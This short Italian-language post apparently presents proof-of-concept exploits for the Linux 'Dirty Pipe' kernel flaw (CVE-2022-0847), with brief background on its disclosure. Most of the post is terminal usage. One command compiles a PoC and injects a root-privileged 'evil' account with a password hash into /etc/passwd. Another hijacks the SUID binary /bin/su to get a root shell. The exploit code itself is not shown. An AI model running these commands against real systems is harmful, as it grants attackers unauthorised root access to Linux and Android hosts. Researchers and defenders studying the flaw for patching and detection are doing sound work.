
Exploit proof-of-concept per CVE-2022-0847 (Dirty Pipe) che consentono l'escalation dei privilegi locali sui kernel Linux 5.8+ sovrascrivendo file di sola lettura o binari SUID.
Oggi, il ricercatore di sicurezza Max Kellermann ha divulgato in modo responsabile la vulnerabilità 'Dirty Pipe' e ha dichiarato che interessa Linux Kernel 5.8 e versioni successive, anche sui dispositivi Android.
La vulnerabilità è tracciata come CVE-2022-0847 e consente a un utente non privilegiato di iniettare e sovrascrivere dati in file di sola lettura, inclusi i processi SUID che vengono eseguiti come root.
Kellerman ha scoperto il bug dopo aver individuato un bug che corrompeva i log di accesso del server web per uno dei suoi clienti.
Poi Bl4sty ha scritto un'altra versione. Invece di sovrascrivere un file come /etc/passwd, sovrascrive un binario SUID specificato dall'utente (come /bin/su), iniettando shellcode che viene poi eseguito con i permessi di un utente privilegiato (cioè root).
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su
Per istruzioni dettagliate, fare riferimento a: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf